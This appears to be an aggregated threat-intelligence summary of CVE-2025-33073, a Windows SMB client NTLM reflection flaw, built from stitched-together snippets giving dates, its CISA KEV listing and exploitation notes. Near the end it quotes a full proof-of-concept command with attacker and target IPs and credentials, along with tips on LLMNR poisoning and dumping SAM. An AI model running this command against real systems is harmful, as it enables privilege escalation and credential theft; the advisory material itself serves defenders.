CVE-2025-33073 is an SMB client elevation of privilege vulnerability that allows authenticated attackers to perform NTLM reflection attacks. While it has a network attack vector, it targets SMB client functionality rather than internet-facing server services, making direct internet exploitation unlikely.
Data Source: CIRCL
Confidence: HIGH
Exploitation Method: OTHER
CVE Published: 2025-06-10
Added to CISA KEV: 2025-10-20
132 days between CVE and KEV
CVE-2025-33073 is an elevation of privilege vulnerability in Windows SMB Client. This flaw has been assigned a CVSSv3 score of 8.8 and is actively exploited in ...
CVE-2025-33073 Microsoft Windows SMB Client Improper Access Control Vulnerability ... These types of vulnerabilities are frequent attack vectors ...
CVE-2025-33073. PoC Exploit for the NTLM reflection SMB flaw. If you're in the same broadcast domain as the device and it's vulnerable to LLMNR poisoning, it's possible to exploit a device without having to register a DNS record. Troubleshooting. I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali.
CVE-2025-33073 is the most recent relay attack, which enables an attacker to relay authentication back to the victim's machine – making it a reflection attack.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
Also, a custom command can be run through proxychains instead of dumping SAM.